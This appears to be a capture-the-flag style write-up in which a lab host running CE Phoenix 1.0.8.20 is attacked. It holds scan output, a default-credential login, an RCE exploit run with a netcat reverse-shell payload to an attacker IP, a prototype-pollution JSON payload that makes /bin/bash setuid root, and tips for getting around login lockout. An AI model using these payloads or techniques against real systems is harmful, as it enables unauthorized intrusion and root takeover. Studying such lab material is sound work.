Host entries
1
10.0.160.231 phobex.echocity-f.com
Content
- Default Credentials
- CE Phoenix 1.0.8.20 Remote Code Execution
- @almela/obx Prototype Pollution
Reconnaissance
Initial reconnaissance for TCP ports
1
2
3
4
nmap -p- -sS --open --min-rate 500 -Pn -n -vvvv -oG allPorts 10.0.160.231
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.0.160.231 () Status: Up
Host: 10.0.160.231 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
Services and Versions running:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
nmap -p22,80 -sCV -n -Pn -vvvv -oN targeted 10.0.160.231
Nmap scan report for 10.0.160.231
Host is up, received user-set (0.17s latency).
Scanned at 2025-02-24 19:56:59 EST for 41s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 bb:8b:4a:b8:d8:62:4d:cb:59:4a:c7:7c:43:0c:7d:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIRQzh/YlEJzovVge+51kZ1Mx5xft/0I/1RPWVmuZuJs
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.61 ((Debian))
|_http-title: Echo Phoenix
| http-methods:
|_ Supported Methods: HEAD POST OPTIONS
|_http-server-header: Apache/2.4.61 (Debian)
Exploitation
There is a Web Service running on port 80 called CE Phoenix looking for exploits on it, we identified the following CE Phoenix 1.0.8.20 Remote Code Execution, but the exploit requires authentication, also the exploit points to the admin URI, I then tried to login using Default Credentials, and I got the pair admin:password123, with this, we can execute the script which is an OS Command Injection vulnerability:
1
2
3
4
5
6
7
8
9
10
11
12
python3 exploit.py http://phobex.echocity-f.com/ 'admin' 'password123' 'nc -e /bin/bash 10.10.5.122 1234'
CE Phoenix v1.0.8.20 - Remote Code Execution
Author:tmrswrr
[+] Starting the exploitation process...
[+] Attempting to exploit the target...
[+] Performing login...
[+] Login successful.
[+] Executing the exploit...
[+] Exploit executed successfully.
Privilege Escalation
For the Privilege Escalation I then proceed to execute the command sudo -l and I can execute a script as user root without password:
1
2
3
4
5
6
www-data@phobex:/var/www/html$ sudo -l
Matching Defaults entries for www-data on phobex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User www-data may run the following commands on phobex:
(ALL : ALL) NOPASSWD: /usr/local/bin/obex
Its content is like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#! /usr/bin/env node
var args = process.argv.slice(2);
const { exec } = require('child_process');
(async () => {
const lib = await import('@almela/obx');
var USER_JSON = JSON.parse(args[0]);
var user={
'username': "root"
};
try {
lib.add (user, USER_JSON)
} catch (e) { }
var newUser={}
if(newUser.authenticated==true)
{
exec(newUser.command);
}
})();
As usual, the vulnerability relays on the imported library, in this case @almela/obx, there is a vulnerability reported as Prototype Pollution in @almela/obx, after reading the article and with the aid of DeepSeek I came with the following payload:
1
2
3
www-data@phobex:/var/www/html$ sudo /usr/local/bin/obex '{"__proto__":{"authenticated":true,"command":"chmod +s /bin/bash"}}'
www-data@phobex:/var/www/html$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23 2023 /bin/bash
And we ARE INSIDEEEE!!!
Post Exploitation
Flags are stored at:
/etc/passwd /etc/shadow environment variables (env command) /root
Credentials
- Credentials identified for CE Phoenix CMS are
admin:password123
Notes
- Always look for admin endpoints, sometimes the webapps have two or more login pages. If the application has a failed user attempt protection, always try to delete the cookies, use another CSRF token or bypass such protection so you are able to perform a dictionary attack, it is important to know how to use Burp Macros for that matter, in this case, this machine took me a lot of time because the credentials
admin:password123did not worked when I tried to use them, but that was because I was on cool off period for attempting a lot of other default credentials.